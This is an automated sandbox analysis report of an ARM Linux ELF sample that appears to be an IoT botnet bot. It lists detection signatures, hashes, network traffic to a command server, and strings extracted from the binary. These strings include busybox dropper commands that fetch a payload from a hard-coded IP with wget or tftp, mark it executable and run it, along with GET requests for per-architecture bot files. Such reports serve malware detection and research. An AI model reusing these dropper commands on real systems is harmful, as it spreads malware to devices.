Linux Analysis Report
arm.elf

Overview

General Information

Sample name: arm.elf
Analysis ID: 1559718
MD5: 3f45dc3fdc50d2412dd299a4190fcccc
SHA1: fe7dddb80fbbf9c1ca71594b88db74aa5282e72a
SHA256: 0b13e408e08c89bac6dc47950aa5faa030c095b439da4d9e31842dceb70db52b
Tags: elf, user-abuse_ch

Detection

Score: 48
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

Source: arm.elf ReversingLabs: Detection: 42%
Source: global traffic TCP traffic: 192.168.2.13:46006 -> 85.239.34.134:7685
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: arm.elf String found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789unknown./. equals www.youtube.com (Youtube)
Source: arm.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: arm.elf String found in binary or memory: http://87.120.116.226
Source: arm.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY
Source: arm.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ
Source: Initial sample String containing 'busybox' found: /bin/busybox TSUNAMI
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo
Source: Initial sample String containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63\x%02x2bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox
Source: Initial sample String containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t
Source: Initial sample String containing 'busybox' found: /bin/busybox tftp -r
Source: Initial sample String containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -en '
Source: Initial sample String containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t
Source: Initial sample Potential command found: GET /fbot.arm5 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.arm7 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.x86 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.mips HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.mipsel HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.powerpc HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.sparc HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.sh4 HTTP/1.0
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal48.linELF@0/0@2/0
Source: /usr/bin/dash (PID: 5416) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
Source: /usr/bin/dash (PID: 5417) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
Source: /tmp/arm.elf (PID: 5428) Queries kernel information via 'uname'
Source: arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmp Binary or memory string: R |U!/etc/qemu-binfmt/arm
Source: arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmp Binary or memory string: :Cx86_64/usr/bin/qemu-arm/tmp/arm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.elf
Source: arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm